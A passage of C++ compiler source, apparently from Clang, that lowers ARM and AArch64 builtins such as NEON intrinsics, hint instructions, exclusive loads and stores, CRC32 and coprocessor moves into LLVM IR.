llvm::Type *Tys[1] = { Ty };
Function *F = CGM.getIntrinsic(Int, Tys);
return EmitNeonCall(F, Ops, "vcvtfp2bf");
}
}
assert(Int && "Expected valid intrinsic number");
// Determine the type(s) of this overloaded AArch64 intrinsic.
Function *F = LookupNeonLLVMIntrinsic(Int, Modifier, Ty, E);
Value *Result = EmitNeonCall(F, Ops, NameHint);
llvm::Type *ResultType = ConvertType(E->getType());
// AArch64 intrinsic one-element vector type cast to
// scalar type expected by the builtin
return Builder.CreateBitCast(Result, ResultType, NameHint);
}
Value *CodeGenFunction::EmitAArch64CompareBuiltinExpr(
Value *Op, llvm::Type *Ty, const CmpInst::Predicate Fp,
const CmpInst::Predicate Ip, const Twine &Name) {
llvm::Type *OTy = Op->getType();
// FIXME: this is utterly horrific. We should not be looking at previous
// codegen context to find out what needs doing. Unfortunately TableGen
// currently gives us exactly the same calls for vceqz_f32 and vceqz_s32
// (etc).
if (BitCastInst *BI = dyn_cast<BitCastInst>(Op))
OTy = BI->getOperand(0)->getType();
Op = Builder.CreateBitCast(Op, OTy);
if (OTy->getScalarType()->isFloatingPointTy()) {
Op = Builder.CreateFCmp(Fp, Op, Constant::getNullValue(OTy));
} else {
Op = Builder.CreateICmp(Ip, Op, Constant::getNullValue(OTy));
}
return Builder.CreateSExt(Op, Ty, Name);
}
static Value *packTBLDVectorList(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Value *ExtOp, Value *IndexOp,
llvm::Type *ResTy, unsigned IntID,
const char *Name) {
SmallVector<Value *, 2> TblOps;
if (ExtOp)
TblOps.push_back(ExtOp);
// Build a vector containing sequential number like (0, 1, 2, ..., 15)
SmallVector<int, 16> Indices;
auto *TblTy = cast<llvm::FixedVectorType>(Ops[0]->getType());
for (unsigned i = 0, e = TblTy->getNumElements(); i != e; ++i) {
Indices.push_back(2*i);
Indices.push_back(2*i+1);
}
int PairPos = 0, End = Ops.size() - 1;
while (PairPos < End) {
TblOps.push_back(CGF.Builder.CreateShuffleVector(Ops[PairPos],
Ops[PairPos+1], Indices,
Name));
PairPos += 2;
}
// If there's an odd number of 64-bit lookup table, fill the high 64-bit
// of the 128-bit lookup table with zero.
if (PairPos == End) {
Value *ZeroTbl = ConstantAggregateZero::get(TblTy);
TblOps.push_back(CGF.Builder.CreateShuffleVector(Ops[PairPos],
ZeroTbl, Indices, Name));
}
Function *TblF;
TblOps.push_back(IndexOp);
TblF = CGF.CGM.getIntrinsic(IntID, ResTy);
return CGF.EmitNeonCall(TblF, TblOps, Name);
}
Value *CodeGenFunction::GetValueForARMHint(unsigned BuiltinID) {
unsigned Value;
switch (BuiltinID) {
default:
return nullptr;
case ARM::BI__builtin_arm_nop:
Value = 0;
break;
case ARM::BI__builtin_arm_yield:
case ARM::BI__yield:
Value = 1;
break;
case ARM::BI__builtin_arm_wfe:
case ARM::BI__wfe:
Value = 2;
break;
case ARM::BI__builtin_arm_wfi:
case ARM::BI__wfi:
Value = 3;
break;
case ARM::BI__builtin_arm_sev:
case ARM::BI__sev:
Value = 4;
break;
case ARM::BI__builtin_arm_sevl:
case ARM::BI__sevl:
Value = 5;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_hint),
llvm::ConstantInt::get(Int32Ty, Value));
}
enum SpecialRegisterAccessKind {
NormalRead,
VolatileRead,
Write,
};
// Generates the IR for the read/write special register builtin,
// ValueType is the type of the value that is to be written or read,
// RegisterType is the type of the register being written to or read from.
static Value *EmitSpecialRegisterBuiltin(CodeGenFunction &CGF,
const CallExpr *E,
llvm::Type *RegisterType,
llvm::Type *ValueType,
SpecialRegisterAccessKind AccessKind,
StringRef SysReg = "") {
// write and register intrinsics only support 32 and 64 bit operations.
assert((RegisterType->isIntegerTy(32) || RegisterType->isIntegerTy(64))
&& "Unsupported size for register.");
CodeGen::CGBuilderTy &Builder = CGF.Builder;
CodeGen::CodeGenModule &CGM = CGF.CGM;
LLVMContext &Context = CGM.getLLVMContext();
if (SysReg.empty()) {
const Expr *SysRegStrExpr = E->getArg(0)->IgnoreParenCasts();
SysReg = cast<clang::StringLiteral>(SysRegStrExpr)->getString();
}
llvm::Metadata *Ops[] = { llvm::MDString::get(Context, SysReg) };
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Type *Types[] = { RegisterType };
bool MixedTypes = RegisterType->isIntegerTy(64) && ValueType->isIntegerTy(32);
assert(!(RegisterType->isIntegerTy(32) && ValueType->isIntegerTy(64))
&& "Can't fit 64-bit value in 32-bit register");
if (AccessKind != Write) {
assert(AccessKind == NormalRead || AccessKind == VolatileRead);
llvm::Function *F = CGM.getIntrinsic(
AccessKind == VolatileRead ? llvm::Intrinsic::read_volatile_register
: llvm::Intrinsic::read_register,
Types);
llvm::Value *Call = Builder.CreateCall(F, Metadata);
if (MixedTypes)
// Read into 64 bit register and then truncate result to 32 bit.
return Builder.CreateTrunc(Call, ValueType);
if (ValueType->isPointerTy())
// Have i32/i64 result (Call) but want to return a VoidPtrTy (i8*).
return Builder.CreateIntToPtr(Call, ValueType);
return Call;
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::write_register, Types);
llvm::Value *ArgValue = CGF.EmitScalarExpr(E->getArg(1));
if (MixedTypes) {
// Extend 32 bit write value to 64 bit to pass to write.
ArgValue = Builder.CreateZExt(ArgValue, RegisterType);
return Builder.CreateCall(F, { Metadata, ArgValue });
}
if (ValueType->isPointerTy()) {
// Have VoidPtrTy ArgValue but want to return an i32/i64.
ArgValue = Builder.CreatePtrToInt(ArgValue, RegisterType);
return Builder.CreateCall(F, { Metadata, ArgValue });
}
return Builder.CreateCall(F, { Metadata, ArgValue });
}
/// Return true if BuiltinID is an overloaded Neon intrinsic with an extra
/// argument that specifies the vector type.
static bool HasExtraNeonArgument(unsigned BuiltinID) {
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vget_lane_f32:
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_f32:
case NEON::BI__builtin_neon_vsha1h_u32:
case NEON::BI__builtin_neon_vsha1cq_u32:
case NEON::BI__builtin_neon_vsha1pq_u32:
case NEON::BI__builtin_neon_vsha1mq_u32:
case NEON::BI__builtin_neon_vcvth_bf16_f32:
case clang::ARM::BI_MoveToCoprocessor:
case clang::ARM::BI_MoveToCoprocessor2:
return false;
}
return true;
}
Value *CodeGenFunction::EmitARMBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
if (auto Hint = GetValueForARMHint(BuiltinID))
return Hint;
if (BuiltinID == ARM::BI__emit) {
bool IsThumb = getTarget().getTriple().getArch() == llvm::Triple::thumb;
llvm::FunctionType *FTy =
llvm::FunctionType::get(VoidTy, /*Variadic=*/false);
Expr::EvalResult Result;
if (!E->getArg(0)->EvaluateAsInt(Result, CGM.getContext()))
llvm_unreachable("Sema will ensure that the parameter is constant");
llvm::APSInt Value = Result.Val.getInt();
uint64_t ZExtValue = Value.zextOrTrunc(IsThumb ? 16 : 32).getZExtValue();
llvm::InlineAsm *Emit =
IsThumb ? InlineAsm::get(FTy, ".inst.n 0x" + utohexstr(ZExtValue), "",
/*hasSideEffects=*/true)
: InlineAsm::get(FTy, ".inst 0x" + utohexstr(ZExtValue), "",
/*hasSideEffects=*/true);
return Builder.CreateCall(Emit);
}
if (BuiltinID == ARM::BI__builtin_arm_dbg) {
Value *Option = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_dbg), Option);
}
if (BuiltinID == ARM::BI__builtin_arm_prefetch) {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *RW = EmitScalarExpr(E->getArg(1));
Value *IsData = EmitScalarExpr(E->getArg(2));
// Locality is not supported on ARM target
Value *Locality = llvm::ConstantInt::get(Int32Ty, 3);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, IsData});
}
if (BuiltinID == ARM::BI__builtin_arm_rbit) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == ARM::BI__builtin_arm_cls) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_cls), Arg, "cls");
}
if (BuiltinID == ARM::BI__builtin_arm_cls64) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_cls64), Arg,
"cls");
}
if (BuiltinID == ARM::BI__clear_cache) {
assert(E->getNumArgs() == 2 && "__clear_cache takes 2 arguments");
const FunctionDecl *FD = E->getDirectCallee();
Value *Ops[2];
for (unsigned i = 0; i < 2; i++)
Ops[i] = EmitScalarExpr(E->getArg(i));
llvm::Type *Ty = CGM.getTypes().ConvertType(FD->getType());
llvm::FunctionType *FTy = cast<llvm::FunctionType>(Ty);
StringRef Name = FD->getName();
return EmitNounwindRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Ops);
}
if (BuiltinID == ARM::BI__builtin_arm_mcrr ||
BuiltinID == ARM::BI__builtin_arm_mcrr2) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_mcrr:
F = CGM.getIntrinsic(Intrinsic::arm_mcrr);
break;
case ARM::BI__builtin_arm_mcrr2:
F = CGM.getIntrinsic(Intrinsic::arm_mcrr2);
break;
}
// MCRR{2} instruction has 5 operands but
// the intrinsic has 4 because Rt and Rt2
// are represented as a single unsigned 64
// bit integer in the intrinsic definition
// but internally it's represented as 2 32
// bit integers.
Value *Coproc = EmitScalarExpr(E->getArg(0));
Value *Opc1 = EmitScalarExpr(E->getArg(1));
Value *RtAndRt2 = EmitScalarExpr(E->getArg(2));
Value *CRm = EmitScalarExpr(E->getArg(3));
Value *C1 = llvm::ConstantInt::get(Int64Ty, 32);
Value *Rt = Builder.CreateTruncOrBitCast(RtAndRt2, Int32Ty);
Value *Rt2 = Builder.CreateLShr(RtAndRt2, C1);
Rt2 = Builder.CreateTruncOrBitCast(Rt2, Int32Ty);
return Builder.CreateCall(F, {Coproc, Opc1, Rt, Rt2, CRm});
}
if (BuiltinID == ARM::BI__builtin_arm_mrrc ||
BuiltinID == ARM::BI__builtin_arm_mrrc2) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_mrrc:
F = CGM.getIntrinsic(Intrinsic::arm_mrrc);
break;
case ARM::BI__builtin_arm_mrrc2:
F = CGM.getIntrinsic(Intrinsic::arm_mrrc2);
break;
}
Value *Coproc = EmitScalarExpr(E->getArg(0));
Value *Opc1 = EmitScalarExpr(E->getArg(1));
Value *CRm = EmitScalarExpr(E->getArg(2));
Value *RtAndRt2 = Builder.CreateCall(F, {Coproc, Opc1, CRm});
// Returns an unsigned 64 bit integer, represented
// as two 32 bit integers.
Value *Rt = Builder.CreateExtractValue(RtAndRt2, 1);
Value *Rt1 = Builder.CreateExtractValue(RtAndRt2, 0);
Rt = Builder.CreateZExt(Rt, Int64Ty);
Rt1 = Builder.CreateZExt(Rt1, Int64Ty);
Value *ShiftCast = llvm::ConstantInt::get(Int64Ty, 32);
RtAndRt2 = Builder.CreateShl(Rt, ShiftCast, "shl", true);
RtAndRt2 = Builder.CreateOr(RtAndRt2, Rt1);
return Builder.CreateBitCast(RtAndRt2, ConvertType(E->getType()));
}
if (BuiltinID == ARM::BI__builtin_arm_ldrexd ||
((BuiltinID == ARM::BI__builtin_arm_ldrex ||
BuiltinID == ARM::BI__builtin_arm_ldaex) &&
getContext().getTypeSize(E->getType()) == 64) ||
BuiltinID == ARM::BI__ldrexd) {
Function *F;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin");
case ARM::BI__builtin_arm_ldaex:
F = CGM.getIntrinsic(Intrinsic::arm_ldaexd);
break;
case ARM::BI__builtin_arm_ldrexd:
case ARM::BI__builtin_arm_ldrex:
case ARM::BI__ldrexd:
F = CGM.getIntrinsic(Intrinsic::arm_ldrexd);
break;
}
Value *LdPtr = EmitScalarExpr(E->getArg(0));
Value *Val = Builder.CreateCall(F, Builder.CreateBitCast(LdPtr, Int8PtrTy),
"ldrexd");
Value *Val0 = Builder.CreateExtractValue(Val, 1);
Value *Val1 = Builder.CreateExtractValue(Val, 0);
Val0 = Builder.CreateZExt(Val0, Int64Ty);
Val1 = Builder.CreateZExt(Val1, Int64Ty);
Value *ShiftCst = llvm::ConstantInt::get(Int64Ty, 32);
Val = Builder.CreateShl(Val0, ShiftCst, "shl", true /* nuw */);
Val = Builder.CreateOr(Val, Val1);
return Builder.CreateBitCast(Val, ConvertType(E->getType()));
}
if (BuiltinID == ARM::BI__builtin_arm_ldrex ||
BuiltinID == ARM::BI__builtin_arm_ldaex) {
Value *LoadAddr = EmitScalarExpr(E->getArg(0));
QualType Ty = E->getType();
llvm::Type *RealResTy = ConvertType(Ty);
llvm::Type *PtrTy = llvm::IntegerType::get(
getLLVMContext(), getContext().getTypeSize(Ty))->getPointerTo();
LoadAddr = Builder.CreateBitCast(LoadAddr, PtrTy);
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_ldaex
? Intrinsic::arm_ldaex
: Intrinsic::arm_ldrex,
PtrTy);
Value *Val = Builder.CreateCall(F, LoadAddr, "ldrex");
if (RealResTy->isPointerTy())
return Builder.CreateIntToPtr(Val, RealResTy);
else {
llvm::Type *IntResTy = llvm::IntegerType::get(
getLLVMContext(), CGM.getDataLayout().getTypeSizeInBits(RealResTy));
Val = Builder.CreateTruncOrBitCast(Val, IntResTy);
return Builder.CreateBitCast(Val, RealResTy);
}
}
if (BuiltinID == ARM::BI__builtin_arm_strexd ||
((BuiltinID == ARM::BI__builtin_arm_stlex ||
BuiltinID == ARM::BI__builtin_arm_strex) &&
getContext().getTypeSize(E->getArg(0)->getType()) == 64)) {
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_stlex
? Intrinsic::arm_stlexd
: Intrinsic::arm_strexd);
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty);
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
Value *Val = EmitScalarExpr(E->getArg(0));
Builder.CreateStore(Val, Tmp);
Address LdPtr = Builder.CreateBitCast(Tmp,llvm::PointerType::getUnqual(STy));
Val = Builder.CreateLoad(LdPtr);
Value *Arg0 = Builder.CreateExtractValue(Val, 0);
Value *Arg1 = Builder.CreateExtractValue(Val, 1);
Value *StPtr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)), Int8PtrTy);
return Builder.CreateCall(F, {Arg0, Arg1, StPtr}, "strexd");
}
if (BuiltinID == ARM::BI__builtin_arm_strex ||
BuiltinID == ARM::BI__builtin_arm_stlex) {
Value *StoreVal = EmitScalarExpr(E->getArg(0));
Value *StoreAddr = EmitScalarExpr(E->getArg(1));
QualType Ty = E->getArg(0)->getType();
llvm::Type *StoreTy = llvm::IntegerType::get(getLLVMContext(),
getContext().getTypeSize(Ty));
StoreAddr = Builder.CreateBitCast(StoreAddr, StoreTy->getPointerTo());
if (StoreVal->getType()->isPointerTy())
StoreVal = Builder.CreatePtrToInt(StoreVal, Int32Ty);
else {
llvm::Type *IntTy = llvm::IntegerType::get(
getLLVMContext(),
CGM.getDataLayout().getTypeSizeInBits(StoreVal->getType()));
StoreVal = Builder.CreateBitCast(StoreVal, IntTy);
StoreVal = Builder.CreateZExtOrBitCast(StoreVal, Int32Ty);
}
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_stlex
? Intrinsic::arm_stlex
: Intrinsic::arm_strex,
StoreAddr->getType());
return Builder.CreateCall(F, {StoreVal, StoreAddr}, "strex");
}
if (BuiltinID == ARM::BI__builtin_arm_clrex) {
Function *F = CGM.getIntrinsic(Intrinsic::arm_clrex);
return Builder.CreateCall(F);
}
// CRC32
Intrinsic::ID CRCIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case ARM::BI__builtin_arm_crc32b:
CRCIntrinsicID = Intrinsic::arm_crc32b; break;
case ARM::BI__builtin_arm_crc32cb:
CRCIntrinsicID = Intrinsic::arm_crc32cb; break;
case ARM::BI__builtin_arm_crc32h:
CRCIntrinsicID = Intrinsic::arm_crc32h; break;
case ARM::BI__builtin_arm_crc32ch:
CRCIntrinsicID = Intrinsic::arm_crc32ch; break;
case ARM::BI__builtin_arm_crc32w:
case ARM::BI__builtin_arm_crc32d:
CRCIntrinsicID = Intrinsic::arm_crc32w; break;
case ARM::BI__builtin_arm_crc32cw:
case ARM::BI__builtin_arm_crc32cd:
CRCIntrinsicID = Intrinsic::arm_crc32cw; break;
}
if (CRCIntrinsicID != Intrinsic::not_intrinsic) {
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
// crc32{c,}d intrinsics are implemnted as two calls to crc32{c,}w
// intrinsics, hence we need different codegen for these cases.
if (BuiltinID == ARM::BI__builtin_arm_crc32d ||
BuiltinID == ARM::BI__builtin_arm_crc32cd) {
Value *C1 = llvm::ConstantInt::get(Int64Ty, 32);
Value *Arg1a = Builder.CreateTruncOrBitCast(Arg1, Int32Ty);
Value *Arg1b = Builder.CreateLShr(Arg1, C1);
Arg1b = Builder.CreateTruncOrBitCast(Arg1b, Int32Ty);
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
Value *Res = Builder.CreateCall(F, {Arg0, Arg1a});
return Builder.CreateCall(F, {Res, Arg1b});
} else {
Arg1 = Builder.CreateZExtOrBitCast(Arg1, Int32Ty);
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
return Builder.CreateCall(F, {Arg0, Arg1});
}
}
if (BuiltinID == ARM::BI__builtin_arm_rsr ||
BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_rsrp ||
BuiltinID == ARM::BI__builtin_arm_wsr ||
BuiltinID == ARM::BI__builtin_arm_wsr64 ||
BuiltinID == ARM::BI__builtin_arm_wsrp) {
SpecialRegisterAccessKind AccessKind = Write;
if (BuiltinID == ARM::BI__builtin_arm_rsr ||
BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_rsrp)
AccessKind = VolatileRead;
bool IsPointerBuiltin = BuiltinID == ARM::BI__builtin_arm_rsrp ||
BuiltinID == ARM::BI__builtin_arm_wsrp;
bool Is64Bit = BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_wsr64;
llvm::Type *ValueType;
llvm::Type *RegisterType;
if (IsPointerBuiltin) {
ValueType = VoidPtrTy;
RegisterType = Int32Ty;
} else if (Is64Bit) {
ValueType = RegisterType = Int64Ty;
} else {
ValueType = RegisterType = Int32Ty;
}
return EmitSpecialRegisterBuiltin(*this, E, RegisterType, ValueType,
AccessKind);
}
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateArmToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
// Deal with MVE builtins
if (Value *Result = EmitARMMVEBuiltinExpr(BuiltinID, E, ReturnValue, Arch))
return Result;
// Handle CDE builtins
if (Value *Result = EmitARMCDEBuiltinExpr(BuiltinID, E, ReturnValue, Arch))
return Result;
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
auto getAlignmentValue32 = [&](Address addr) -> Value* {
return Builder.getInt32(addr.getAlignment().getQuantity());
};
Address PtrOp0 = Address::invalid();
Address PtrOp1 = Address::invalid();
SmallVector<Value*, 4> Ops;
bool HasExtraArg = HasExtraNeonArgument(BuiltinID);
unsigned NumArgs = E->getNumArgs() - (HasExtraArg ? 1 : 0);
for (unsigned i = 0, e = NumArgs; i != e; i++) {
if (i == 0) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v:
case NEON::BI__builtin_neon_vld1q_lane_v:
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v:
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v:
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v:
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v:
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v:
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v:
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp0 = EmitPointerWithAlignment(E->getArg(0));
Ops.push_back(PtrOp0.getPointer());
continue;
}
}
if (i == 1) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v:
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v:
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v:
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v:
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v:
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v:
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v:
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v:
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp1 = EmitPointerWithAlignment(E->getArg(1));
Ops.push_back(PtrOp1.getPointer());
continue;
}
}
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
} else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext())));
}
}
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vget_lane_f32:
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
return Builder.CreateExtractElement(Ops[0], Ops[1], "vget_lane");
case NEON::BI__builtin_neon_vrndns_f32: {
Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Tys[] = {Arg->getType()};
Function *F = CGM.getIntrinsic(Intrinsic::arm_neon_vrintn, Tys);
return Builder.CreateCall(F, {Arg}, "vrndn"); }
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_f32:
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vsha1h_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1h), Ops,
"vsha1h");
case NEON::BI__builtin_neon_vsha1cq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1c), Ops,
"vsha1h");
case NEON::BI__builtin_neon_vsha1pq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1p), Ops,
"vsha1h");
case NEON::BI__builtin_neon_vsha1mq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1m), Ops,
"vsha1h");
case NEON::BI__builtin_neon_vcvth_bf16_f32: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vcvtbfp2bf), Ops,
"vcvtbfp2bf");
}
// The ARM _MoveToCoprocessor builtins put the input register value as
// the first argument, but the LLVM intrinsic expects it as the third one.
case ARM::BI_MoveToCoprocessor:
case ARM::BI_MoveToCoprocessor2: {
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI_MoveToCoprocessor ?
Intrinsic::arm_mcr : Intrinsic::arm_mcr2);
return Builder.CreateCall(F, {Ops[1], Ops[2], Ops[0],
Ops[3], Ops[4], Ops[5]});
}
}
// Get the last argument, which specifies the vector type.
assert(HasExtraArg);
const Expr *Arg = E->getArg(E->getNumArgs()-1);
Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(getContext());
if (!Result)
return nullptr;
if (BuiltinID == ARM::BI__builtin_arm_vcvtr_f ||
BuiltinID == ARM::BI__builtin_arm_vcvtr_d) {
// Determine the overloaded type of this builtin.
llvm::Type *Ty;
if (BuiltinID == ARM::BI__builtin_arm_vcvtr_f)
Ty = FloatTy;
else
Ty = DoubleTy;
// Determine whether this is an unsigned conversion or not.
bool usgn = Result->getZExtValue() == 1;
unsigned Int = usgn ? Intrinsic::arm_vcvtru : Intrinsic::arm_vcvtr;
// Call the appropriate intrinsic.
Function *F = CGM.getIntrinsic(Int, Ty);
return Builder.CreateCall(F, Ops, "vcvtr");
}
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type = Result->getZExtValue();
bool usgn = Type.isUnsigned();
bool rightShift = false;
llvm::FixedVectorType *VTy =
GetNeonType(this, Type, getTarget().hasLegalHalfType(), false,
getTarget().hasBFloat16Type());
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
// Many NEON builtins have identical semantics and uses in ARM and
// AArch64. Emit these in a single function.
auto IntrinsicMap = makeArrayRef(ARMSIMDIntrinsicMap);
const ARMVectorIntrinsicInfo *Builtin = findARMVectorIntrinsicInMap(
IntrinsicMap, BuiltinID, NEONSIMDIntrinsicsProvenSorted);
if (Builtin)
return EmitCommonNeonBuiltinExpr(
Builtin->BuiltinID, Builtin->LLVMIntrinsic, Builtin->AltLLVMIntrinsic,
Builtin->NameHint, Builtin->TypeModifier, E, Ops, PtrOp0, PtrOp1, Arch);
unsigned Int;
switch (BuiltinID) {
default: return nullptr;
case NEON::BI__builtin_neon_vld1q_lane_v:
// Handle 64-bit integer elements as a special case. Use shuffles of
// one-element vectors to avoid poor code for i64 in the backend.
if (VTy->getElementType()->isIntegerTy(64)) {
// Extract the other lane.
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
int Lane = cast<ConstantInt>(Ops[2])->getZExtValue();
Value *SV = llvm::ConstantVector::get(ConstantInt::get(Int32Ty, 1-Lane));
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV);
// Load the value as a one-element vector.
Ty = llvm::FixedVectorType::get(VTy->getElementType(), 1);
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(Intrinsic::arm_neon_vld1, Tys);
Value *Align = getAlignmentValue32(PtrOp0);
